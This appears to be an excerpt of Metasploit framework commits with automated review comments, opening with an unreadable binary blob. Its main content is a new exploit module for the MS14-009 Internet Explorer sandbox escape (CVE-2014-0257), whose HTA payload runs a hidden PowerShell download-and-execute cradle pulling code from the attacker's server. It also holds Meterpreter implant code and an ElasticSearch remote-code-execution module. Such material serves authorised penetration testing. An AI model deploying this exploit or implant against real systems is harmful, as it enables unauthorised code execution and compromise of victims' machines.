z$6ujnTYVib3pF+K)OdKdbB;dS!DqJ{t9W`mJbP*B{9JRkLvHU@Rq$2#>hSFK)y=b` zk@rsx@kR@$4)GCY7&J78XY+<spt-W9nrFImdAX;lvAJ<|OD^IPsA#UAv(7o2H@g~Y zSMw6vveeXI<#2>}v8}m9?$#x_o%tTz+-F+xh}q0H$oZDr`lKBf`9wLXR9D5DYS(e+ zXiatVh-a#Iq4oK4id`%pURIx94$rP=UeK_P@2fY>cC^;!Rmyk0!?Rac)HPSncFY~& z6PkPMR6=vd<S8_Fq;NzJ&9&<d%lO8a$j+$IgL|5OvVMl1tNZmreX)MAzDB=X|FphS zKi>I4XR-5p&LhrqT`jJsT`#&a-Jf>%x?gaA$e3kZWjtv7%t-Sr^E7*I@|@@G_RjGw z_AU2a@9XkC?CbLl`hMv9lkY9xBD2)2GS{28n)jNI`hVy51d0MT2W|^I7nmKqICy99 zy3pT39|+G5yTak{>hQYoli}}&XGI>3yc9VYsfoT6{drU-^{wRdL;6C!S$|eP&G|9s zYG<qSZs)7cNv=y=Uvu5>`m-y;J<olfyW0J-`+$3vvBan`ZZPgN28^E?Cworw%=awy zZ1eotlkV;DzV6k0Q+>t0%Y7St4%6)q`_J{?>hJN#0?!8D4qh2LBfK!&7aj=zI(%y6 z+{h)7MC1l?^IGJc$mvl}G#<Sq+8q5(^!w2lqkoBNbc`9u{v>_2?$q=2bM>{<-Z%8e z^&jZ_^h5fvKE-*ebEY%L>2gM#ac84*jw|Gv?<#dY>iVN=*ma!S>ptJT)V<Q(?S9z( z6Zc=;aiiL}nwrh>T<6*B`Ksq-&#Ru-J-_n&&hsbFQO_jrRPV{&>E4fdKkl95^?D=T z^SmYAGVi6{8gG;L8t={CZQieYf9gHx{hK$#cfZeN#?2<P!yGiv_c!~$?Ejj7X|OrC zIrxR(mxJBG?ZKYl^T9WR9}LY1IYKi-*`b_}9x_5^=$cSRXme;ws5A7}(B!a#_Q?tB zVI#aWe0BJN@Gk17KfIed8VnDG_k=$hnHkBB<V5tyt<kN~??nfr&qohNMM)c?-JH6q z$MhZgL;7R-e^4*SJ2Rahbzb9q)|pK$Jn4FcdI-38yMO5}GcGk&8EcGs<8tE)<CDfl z<2vKB#ulT~_>ytEvEAq~?nCNcH{M5!K1Dko^-l7=&zI$!=9})z^R4k+=iBVt;_E~L zxB9w$+kHL0Klp}yM}3-^ZeC`#np@1<%&lg(x!ruq{GEA*Kii+<*Zqdy^oRU0e}Vt= z{!V|Ff2+US|IJ`eXdrZ2*ctYQw?`g|^hYU3oO6+YGQC<~r{AitaDB;m#5>^qq4yKM z|1it^U-#DpZwc>2eqRZn8Hq*;Ba0)|k+#U^BezBFjNBJ_F>-wLqtW8%1<`fU8=^Nw z??8fnC49@-mq&(9(|@7=UO&Zoh4W44FI-=6_fRK4ch5BZMyatHnTR39%RHBQs_1c_ z@?7h=*|Qay-sySFv)l6%<YSmuqNaP#@jAUe<l<a!v3H60BJWCXwYMJGX!Evvuk+sE z{erj4d%O2;q~rnbx4n;fcY6oD&wF3?{=|F0`)ltXyl;Bn_D-gMWKpLd@tx&6$EW+e zzKAd1x4?ISZ<+66UzM-c*XX;#x50Of@3X!eeYg0&;@d`D@9;h3d(`)&Z@~AQ?<L=l zeLwa6%J+uv2=$+4PBBk1r<tdlXPUFkT+?F)%$QkZE;LKbi_LO#wb@`cGe&GQuQzWn zJIybeUp4PBzhORVK4T7<ubRIw7Y2?5KN6ZBDh*u}x-}FJuL^Gqe<S=jviET0&ylp~ zl<1mhee}j?SM=M_$D~dZ%;CVB`rq`=x|SeO*BW0m?l6w{_L;vl-!#wmf63qLf6U() z{9SMcTvvqd3OyeBW9ToTGZ}}LhAYB}@Gaq&!`Ts6q%_hP>4<zW@(twRvB>u#zl!`J 
zG939^WJdJts581SdSP^B^s;DMbR(_$<!E>GuIR(jN3A~aTJ-hkk*Lh5hseu0x?7*G zU!X73SL;ps75X*$W__Ffq+aQ~()nrU7o2xGzvg_z`6K7=oPTk?<DAM}cb6;T%6F}D z-Q?<W-OVWXGuNB0w_P50o_izX#f$F4ZjTW(<{7scKVZagdn%ENuX(=hdCs%f^P1;? z=hvP^j1I5U3(ls_*PGXwHzECBH=j2TnZxE3f0q9v{$hWrzuNyr|Kt7_{IB`n@c+?& zV&DS-XJAp_hQKcZq2Ql`XNO)5ofY<no2c#IhW|#L%#C;>;mFcRRiq*E$;fq)TNtZl zY^0D|)SPmc-lreYPhjkGIL~+f(D|10gRYObvRzTvh0G-zT%UE_=(^oCNO|VCtK3(( zr%;Yn#y5=DjDyA-#&Mn#J##!ojM-J522Z=^M$fIDdpr+$`aJ`l7m@YJjC}dXcf$J> z?^8(cKFU{aUP;-`^55n^HLx^rX<$R(jliS9UkCpfTo76kni~!<s#k>1Vw5tYc~PyK z=h4Y-F742+_vptt{Z8Gr%vIsK*7cHW8e?(=b6uJdF^U+EzHR);IK|`i{Dv_&%lnY` zN$)G(pL?hI)>}PbJ2Jo5_cP|Y$>u5M3{yv@E6k_O?<2WynJ4)_=r4=jAN@mA+rj-s z((HBCyYf8?Jc~W|dmf=ozx3pIUG&-2-WwUcAN2m-dxGx+zPa?ekncQS+*j>eM>?Nj zWcxZj>~-IteT9r>_n6uKfdBQtuL6Gx<OB<XTY|R+w=tT(9DF@^F!<ZxAA)ZM7llef zH-~NubtB#Pg}xc;4}FA@d|tRX{Ajo~G8Acx9+Ecew}v+D>w2%Vk5TzW=g*ygcAoB< z<67$Kb`7}qyR(cE->v4!fl~wFKz^V)ur_c?=)uUtkw@qcPeh)M{72-u$o<hrqR*)D zY)IYnJzcNV@6-1=PjS8DI?a8KJM3Oetv0)_bKmCvn)^}rv&?tDhxeI=Vazwmj1T&~ z%*9py%l+&8oBVzLGXlARy8@2~1_Hkh93PAaR|KyOelge^d@lH6@Qjcrw4Pb&bD^!F zM?=q{LwpzsT@)@0Z;tdZ&T9L4r-P!sq2KJ(-0$;zz%$(w@|=$}UCq3DljjcP>0!@z zJkNSw@chX0Q`+FSwC!7-H17%CQ@p2n&+vZ28}gPiepY&Gz0KaMyx;Zyh|$sKd((Hi z{|x`9nJ0Sv5Bk65f6^ZatO!;GGsCxs?+u%gSfn^|apaeb51wdmR6ESQSMu?k{*r!` zE6Y8@eXsjL_hXd(LL*_^Yq&f&GaF5R*Zdm_#X<$hZC3c~uo=EEd{g)hPJc+V?!SM+ zoEO@|95W?S6ZufIG};t>HYyt}*`zZGJ?;`lmapg!>JRHr=uhiEB;|d~EQj^K>gi5- zrniT=rp8(4OgLMdZO#qOcIPJN7H6lk%emFr<Lq_raAvqNU0JS~^w%7h?lN2^I!nw| z;3{$zyW;3BWv&&ja#xkB##QG^(4X7r(e18Ht`65`*A`bNqt#X<XS=J%)$7{f+UeR& zPv7I(=Q`jz<T~Oy>PmNKx~EYWGu=6E!yR%LxQpGT?iGv#b?z4T2KOfSW_PE1t9v`z z=1zAX^WdO+k9!}Q-68i8_fdDck!egbW*9S#9AqbC6d1+Kkt>WUqt0kCHW-_X&FBnU z(HMG-okpLr+ZZ(V82gL^#v$W~anwlnWO`<JW_ofw22xSrDfX0lRxsAod0IRhJe$zF zI+<IydwQ8&`<Pt^J$pR+7*7v*j-Z33do#V$yfeHry*XY3DJftiD)p}LR(b2ZE#3{@ zP2SDkPVZLlc5knDr?=0VVfT3VF~1)29zkbG_hq87%<#?h<@gNxcmcX-sc!}IYMrlz zS#^_-hGYZmAkg95oNSqH=XU2l=YHn_=RxNo=b_M%(9uwOI5RvgJR>|4?aT;=!Ugo~ 
z((sCKRk$wP65bHr6y6-}3~vo@5BH*%^r5j0GKTL99|#``9|<1~r$;g)(;_p_-f|*F zBorw?c1t5G7}x6}Es+h8O_9x!&dAot_DFAJXQVH(J2DvA6WJFz5IGb%5;+=4k7h=v zMQ5<Xk`pzep=bfxO=)yRv?^K`ZHaD(Zi;S>cA^n(rzh-;_C<FyEAENziymOyITAf8 zV^1ti+jAVx$mp5+G<}9XQ_s;2J){@t#d@i}La);6^cH=CzKOZAQ{Sp@*Lzu+^y$0x zL46N$eE=Q%h<+5w&U8+5&agCX!x?fGuyQGNu5eZ%=Pk(iCaWH|Qir|Hos4q3orBIj z)aL=}@`&@OGaZSa=9+=b=OFJPWW5+UUxAF*S@YE<B)b!--i}1?boKokBs#;$GNv02 zBiqmo(}*$e#2FLIS;r)dHly9>Ko9ORy3v7m7`u#qRyIS%USmJ=<zZvk&^#HQEXFv8 zC)=ZYOizs2Gwvz#lzVDC2~QhyXoqKur_0mr>GACF?6PLkA+&`3o`aslmgbn@%|d&0 zc(c8_*Yw7`Mcz2;igMN!2}^hE@NPkK>}LJ6!@JAdkKQ}v-Rs@YO5?D1m=#rqr7=2u z+31U=FXk&^<|^}*`)Yg%Uz@Mp*TMYNg;p+l;x1o5TH+A1=6>Hn-(hrg&CD>f%;~1X z%x3;HE$uLFmNBc>m<hAZY-bI##q45+?=g3nyUc!b0L^f(x!*i!9!8hZ{26F7)BO%~ zdL4Z}<}dQc{bl}ge~mxkZ}YeNJN#Q1v%6X6?eOpN_xlI@L;k(~{r-dg!~S8v7RU%> z1*Qiaf$V@DFat4GsqsKrpgd3$NCesf?SYQKmOxjaJJ1u@5!e;zXI2^t><#P>91I)| z3<tDeMvxEB1|71o9Z$2K&B~@%==2M%JWbn;^X~uDD0YxOc9>o^Oh4l>>u3gjEsNeZ zo&M&a$JyLX`dy5kS47{7)BDQkf93SR8v0;@Uf4!IY^Nu7&=<GR8@uR_-So&F`s5CJ z<u3YVKRt7RzBxqi+)Mx5PY*pvA3aPj9ajA`!Tu2QhNh?M8T8dGdh2xhtAie!O`qlY zP*!;%)_Dbb5q&pK?=7SMmeYf4=)(!Uik8?;?S+Cd=JL{DS+G3V7VKaxy46~V_6Bzc z_XPK%yBrE04ju^}4NkLGq-IFXg~g$&P)n%IT9<Z)dP99^Gee<0p#!0VAsG!b!&%{M z#=%%P&KOt~t_im>0=9>{82`E%{dQR^)q{+D>5&Y^y(~sOBVsb@#ToPJ8132_?>Zt| z&>wa&)=iI^)avL+wuPFL5p3M})t;seQ!T0EmyBL<O5A3RTK)PE<CHx@Ih@(fB1WYa zX5DVaqCw|g#`KxYutm(O<;<uFW>b5t>0$QV&D^=)b<lN~Rq|1n=FS+IH%)8iEOWOp zS9ZB~x%aw<ISeD+8bflJ6N{J+YZyDWT4Tn(k+I?^^WSvFh%#ooHpYbQj0S^@0~z%F zBKms=eSE;Xhkl*K45c$W#hIBB^xqxyS?R5rrnV(b3t95e?;M~MLyV?-Q|6~(##GIf z?oyh>G*>@!@U(w=&fOdkIoT5I40a`@r3XE5M{s9wSFkVGkK_yl2ZKYF{Ok+v4;~ni zqG9An3#ErLLYbkg(6rE4O-o5uQK&c+XAM}!DzF?Ws|nSG5|*rO2(^bcjqHSUp=)-B zwugF<z8#^Rp<R{??q;80(2~Txp?#tKNqL;coNO>3mog8xGY@w#6ZeL9AcY7^cN%Aa z@SeHTWTuKSR~0c^#hI_ln6b*8)0v0*(K-e^LueeCXc@)m7MmD*2N`K+FuD@?|HAcu E0ARpYAOHXW literal 0 HcmV?d00001 
diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
new file mode 100644
index 0000000000..fd39ad0a0f
--- /dev/null
+++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = GreatRanking
+
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::EXE
+ include Msf::Exploit::Remote::HttpServer
+ include Msf::Post::Windows::Priv
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape',
+ 'Description' => %q{
+ This module abuses a process creation policy in the Internet Explorer Sandbox which allows
+ to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
+ exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
+ Level. Further interaction with the component allows to escape the Enhanced Protected Mode
+ and execute arbitrary code with Medium Integrity.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'James Forshaw', # Vulnerability Discovery and original exploit code
+ 'juan vazquez' # metasploit module
+ ],
+ 'Platform' => [ 'win' ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'Targets' =>
+ [
+ [ 'IE 8 - 11', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate'=> "Feb 11 2014",
+ 'References' =>
+ [
+ ['CVE', '2014-0257'],
+ ['MSB', 'MS14-009'],
+ ['BID', '65417'],
+ ['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
+ ]
+ ))
+
+ register_options(
+ [
+ OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
+ ])
+ end
+
+ def exploit
+ print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
+
+ mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
+ if mod_handle['return'] == 0
+ fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
+ end
+
+ unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+ fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
+ end
+
+ begin
+ Timeout.timeout(datastore['DELAY']) { super }
+ rescue Timeout::Error
+ end
+ end
+
+ def primer
+ exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta"
+ session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri)
+
+ temp = session.sys.config.getenv('TEMP')
+
+ print_status("Loading Exploit Library...")
+
+ session.core.load_library(
+ 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
+ 'TargetFilePath' => temp + "\\CVE-2014-0257.dll",
+ 'UploadLibrary' => true,
+ 'Extension' => false,
+ 'SaveToDisk' => false
+ )
+ end
+
+ def on_request_uri(cli, request)
+ if request.uri =~ /\.hta$/
+ print_status("Sending hta...")
+ download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}/#{rand_text_alpha(4 + rand(4))}.psh'))"
+ command = "powershell.exe -w hidden -nop -c #{download_and_run}"
+ hta = <<-eos
+<script>
+var command = "cmd.exe /c #{command}";
+var shell = new ActiveXObject("WScript.Shell");
+shell.Run(command);
+</script>
+ eos
+ send_response(cli, hta, {'Content-Type'=>'application/hta'})
+ elsif request.uri =~ /\.psh$/
+ print_status("Sending psh payload...")
+ data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ else
+ send_not_found(cli)
+ end
+ end
+
+ def get_dll
+ path = File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll")
+ dll = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+ dll
+ end
+
+end
+
From 2ce6f325f5a3aaf3757b790e0f156fa328ea7351 Mon Sep 17 00:00:00 2001
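Review bot: `get_dll` at the end of ms14_009_ie_dfsvc.rb has no caller anywhere in this new file, and it rebuilds the same `CVE-2014-0257.dll` path that `primer` already hands to `load_library`; the method should either be removed or become the single place the path is built so the two copies cannot drift. In `exploit`, the empty `rescue Timeout::Error` discards the timeout with no explanation; a one-line comment such as `# DELAY elapsed without a payload request; handled by falling through` would show the empty handler is deliberate. The file header comment also reads `http//metasploit.com/download`, which is missing the colon after `http`.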
From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Thu, 29 May 2014 11:52:17 -0500 Subject: [PATCH 405/853] Be more specific with Nokogiri check There are still strong reservations about using Nokogiri to parse untrusted XML data. http://www.wireharbor.com/hidden-security-risks-of-xml-parsing-xxe-attack/ It is also believed that many desktop operating systems are still shipping out-of-date and vulnerable libxml2 libraries, which become exposed via Nokogiri. For example: http://stackoverflow.com/questions/18627075/nokogiri-1-6-0-still-pulls-in-wrong-version-of-libxml-on-os-x While this isn't a problem for binary builds of Metasploit (Metasploit Community, Express, or Pro) it can be a problem for development versions or Kali's / Backtrack's version. So, the compromise here is to allow for modules that don't directly expose XML parsing. I can't say for sure that the various libxml2 vulnerabilities (current and future) aren't also exposed via `Nokogiri::HTML` but I also can't come up with a reasonable demo. Metasploit committers should still look at any module that relies on Nokogiri very carefully, and suggest alternatives if there are any. But, it's sometimes going to be required for complex HTML parsing. tl;dr: Use REXML for XML parsing, and Nokogiri for HTML parsing if you absolutely must. --- tools/msftidy.rb | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 8c5d82458d..81e3a5367e 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb 
@@ -113,16 +113,32 @@ class Msftidy end end + # Updated this check to see if Nokogiri::XML.parse is being called + # specifically. The main reason for this concern is that some versions + # of libxml2 are still vulnerable to XXE attacks. REXML is safer (and + # slower) since it's pure ruby. Unfortunately, there is no pure Ruby + # HTML parser (except Hpricot which is abandonware) -- easy checks + # can avoid Nokogiri (most modules use regex anyway), but more complex + # checks tends to require Nokogiri for HTML element and value parsing. def check_nokogiri - msg = "Requiring Nokogiri in modules can be risky, use REXML instead." + msg = "Using Nokogiri in modules can be risky, use REXML instead." has_nokogiri = false + has_nokogiri_xml_parser = false @source.each_line do |line| if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/ has_nokogiri = true break end end - error(msg) if has_nokogiri + if has_nokogiri + @source.each_line do |line| + if line =~ /Nokogiri::XML.parse/ or line =~ /Nokogiri::XML::Reader/ + has_nokogiri_xml_parser = true + break + end + end + end + error(msg) if has_nokogiri_xml_parser end def check_ref_identifiers From dfa61b316ec7184edaa8ec60da864f3acdd62bd7 Mon Sep 17 00:00:00 2001 From: sinn3r <wei_chen@rapid7.com> Date: Thu, 29 May 2014 12:20:40 -0500 Subject: [PATCH 406/853] A bit of description change --- .../exploits/multi/elasticsearch/script_mvel_rce.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index 9e5a2db466..4cea8269d3 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb 
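Review bot: The second pass added to `check_nokogiri` in tools/msftidy.rb only recognises the literal spellings `Nokogiri::XML.parse` and `Nokogiri::XML::Reader`, so a module that reaches the same libxml2 XML parser through `Nokogiri::XML(...)`, `Nokogiri.XML(...)` or `Nokogiri::XML::Document.parse` passes the check although the XXE concern in the commit message applies to it equally. Matching the namespace rather than two call forms, e.g. `if line =~ /Nokogiri(?:::|\.)XML\b/`, covers those entry points and still leaves `Nokogiri::HTML` alone. The check is also gated on a `require`/`load` of nokogiri inside the module, so a module that uses the constant without requiring it itself is never inspected. Since the error now depends on XML parsing rather than on the require, the message would be clearer as `"Parsing XML with Nokogiri can be risky, use REXML instead."`.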
@@ -16,11 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in ElasticSearch, - exploitable by default on ElasticSearch prior to 1.2.0. The problem exists on - the REST API, accessible without authentication, neither authorization, where - the search function allows for dynamic scripts execution, which allows remote - attackers to execute arbitrary Java code. This module has been tested successfully - on ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. + exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the + REST API, which requires no authentication or authorization, where the search + function allows dynamic scripts execution, and can be used for remote attackers + to execute arbitrary Java code. This module has been tested successfully on + ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. }, 'Author' => [ From aea0379451b5cc464ac5563a7e5219eb36798b46 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 12:37:51 -0500 Subject: [PATCH 407/853] Fix typos --- .../scanner/elasticsearch/indeces_enum.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb index 12895c27bc..196d77aec0 100644 --- a/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb 
@@ -13,9 +13,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'ElasticSearch Indeces Enumeration Utility', + 'Name' => 'ElasticSearch Indices Enumeration Utility', 'Description' => %q{ - This module enumerates ElasticSearch Indeces. It uses the REST API + This module enumerates ElasticSearch Indices. It uses the REST API in order to make it. }, 'Author' => @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Querying indeces...") + vprint_status("#{peer} - Querying indices...") begin res = send_request_raw({ 'uri' => '/_aliases', @@ -66,10 +66,10 @@ class Metasploit3 < Msf::Auxiliary :name => 'elasticsearch' ) - indeces = [] + indices = [] json_body.each do |index| - indeces.push(index[0]) + indices.push(index[0]) report_note( :host => rhost, :port => rport, @@ -80,8 +80,8 @@ class Metasploit3 < Msf::Auxiliary ) end - if indeces.length > 0 - print_good("#{peer} - ElasticSearch Indeces found: #{indeces.join(", ")}") + if indices.length > 0 + print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}") end end From d8dcfd8f41a219956c20d3045348b6c8bda9a8e2 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Thu, 29 May 2014 13:48:15 -0400 Subject: [PATCH 408/853] Update pymeterpreter netlink to support python3 --- data/meterpreter/ext_server_stdapi.py | 53 ++++++++++++++++++++++++--- data/meterpreter/meterpreter.py | 5 ++- 2 files changed, 52 insertions(+), 6 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index ae9cab6cb8..c22b6daa17 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py 
@@ -48,6 +48,16 @@ try: except ImportError: has_winreg = False +if sys.version_info[0] < 3: + is_bytes = lambda obj: issubclass(obj.__class__, str) + bytes = lambda *args: str(*args[:1]) + NULL_BYTE = '\x00' +else: + is_bytes = lambda obj: issubclass(obj.__class__, bytes) + str = lambda x: __builtins__['str'](x, 'UTF-8') + NULL_BYTE = bytes('\x00', 'UTF-8') + long = int + if has_ctypes: # # Windows Structures @@ -503,6 +513,40 @@ def get_stat_buffer(path): return st_buf def netlink_request(req_type): + import select + # See RFC 3549 + NLM_F_REQUEST = 0x0001 + NLM_F_ROOT = 0x0100 + NLMSG_ERROR = 0x0002 + NLMSG_DONE = 0x0003 + + sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE) + sock.bind((os.getpid(), 0)) + seq = int(time.time()) + nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC) + sock.send(nlmsg) + responses = [] + if not len(select.select([sock.fileno()], [], [], 0.5)[0]): + return responses + raw_response_data = sock.recv(0xfffff) + response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) + raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] + while response.type != NLMSG_DONE: + if response.type == NLMSG_ERROR: + break + response_data = raw_response_data[:(response.len - 16)] + responses.append(response_data) + raw_response_data = raw_response_data[len(response_data):] + if not len(raw_response_data): + if not len(select.select([sock.fileno()], [], [], 0.5)[0]): + break + raw_response_data = sock.recv(0xfffff) + response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) + raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] + sock.close() + return responses + +def _netlink_request(req_type): # See RFC 3549 NLM_F_REQUEST = 0x0001 NLM_F_ROOT = 0x0100 
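Review bot: In the rewritten `netlink_request` (second hunk of ext_server_stdapi.py), the early `return responses` taken when the first `select.select(...)` times out leaves `sock` open, because `sock.close()` is only reached after the loop. Calling `sock.close()` on the line before that `return responses`, or wrapping the body in `try:` / `finally: sock.close()`, releases the netlink socket on every path. The slice `raw_response_data[:(response.len - 16)]` hard-codes 16 where the surrounding lines use `ctypes.sizeof(NLMSGHDR)`; using the same expression keeps the header size in one place. The previous implementation is kept as `_netlink_request` with no caller visible in this hunk, so it looks like dead code unless something outside the hunk still uses it.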
@@ -699,9 +743,8 @@ def stdapi_sys_process_get_processes_via_proc(request, response): cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ') status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read() status_data = map(lambda x: x.split('\t',1), status_data.split('\n')) - status_data = filter(lambda x: len(x) == 2, status_data) status = {} - for k, v in status_data: + for k, v in filter(lambda x: len(x) == 2, status_data): status[k[:-1]] = v.strip() ppid = status.get('PPid') uid = status.get('Uid').split('\t', 1)[0] @@ -974,7 +1017,7 @@ def stdapi_net_config_get_interfaces(request, response): else: return ERROR_FAILURE, response for iface_info in interfaces: - iface_tlv = '' + iface_tlv = bytes() iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown')) iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00')) if 'mtu' in iface_info: @@ -1002,7 +1045,7 @@ def stdapi_net_config_get_interfaces_via_netlink(): 0x0100: 'PROMISC', 0x1000: 'MULTICAST' } - iface_flags_sorted = iface_flags.keys() + iface_flags_sorted = list(iface_flags.keys()) # Dictionaries don't maintain order iface_flags_sorted.sort() interfaces = {} @@ -1106,7 +1149,7 @@ def stdapi_net_config_get_interfaces_via_osxsc(): hw_addr = hw_addr.replace(':', '') hw_addr = hw_addr.decode('hex') iface_info['hw_addr'] = hw_addr - ifnames = interfaces.keys() + ifnames = list(interfaces.keys()) ifnames.sort() for iface_name, iface_info in interfaces.items(): iface_info['index'] = ifnames.index(iface_name) diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index f80318e13d..63a3f43e8e 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py 
@@ -510,6 +510,9 @@ class PythonMeterpreter(object): if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0): if hasattr(os, 'setsid'): - os.setsid() + try: + os.setsid() + except OSError: + pass met = PythonMeterpreter(s) met.run() From 17fb48eaa302ef3eb7bdcb3fa791e9aed73dc2a4 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Thu, 29 May 2014 13:06:47 -0500 Subject: [PATCH 409/853] Refactor check_nokogiri in msftidy --- tools/msftidy.rb | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 81e3a5367e..949c20ce2c 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -125,17 +125,15 @@ class Msftidy has_nokogiri = false has_nokogiri_xml_parser = false @source.each_line do |line| - if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/ - has_nokogiri = true - break - end - end - if has_nokogiri - @source.each_line do |line| - if line =~ /Nokogiri::XML.parse/ or line =~ /Nokogiri::XML::Reader/ + if has_nokogiri + if line =~ /Nokogiri::XML\.parse/ or line =~ /Nokogiri::XML::Reader/ has_nokogiri_xml_parser = true break end + else + if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/ + has_nokogiri = true + end end end error(msg) if has_nokogiri_xml_parser From 15dc33591bab1ff3e66da482f04ca0f5299c0aad Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Thu, 29 May 2014 15:09:09 -0400 Subject: [PATCH 410/853] In pymeterpreter use a MeterpreterFile obj for Py v3 --- data/meterpreter/ext_server_stdapi.py | 19 ++++++++------- data/meterpreter/meterpreter.py | 34 +++++++++++++++++---------- 2 files changed, 33 insertions(+), 20 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index c22b6daa17..416e2dbc41 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py 
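Review bot: The single-pass rewrite of `check_nokogiri` in tools/msftidy.rb changes what is scanned: XML parser calls are now only looked for on lines that follow the `require`/`load` line, whereas the two-pass version it replaces scanned the whole source once a require was found anywhere, so a use that precedes the require is no longer reported. If that is intended it deserves a comment above the loop, for example `# Only lines after the nokogiri require are inspected`. On style, the `else` wrapping a lone `if` can be `elsif line =~ /^\s*(require|load)\s+['"]nokogiri['"]/`, and the `or` between the two matches should be `||` to avoid the low-precedence keyword. The method body continues outside the hunk.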
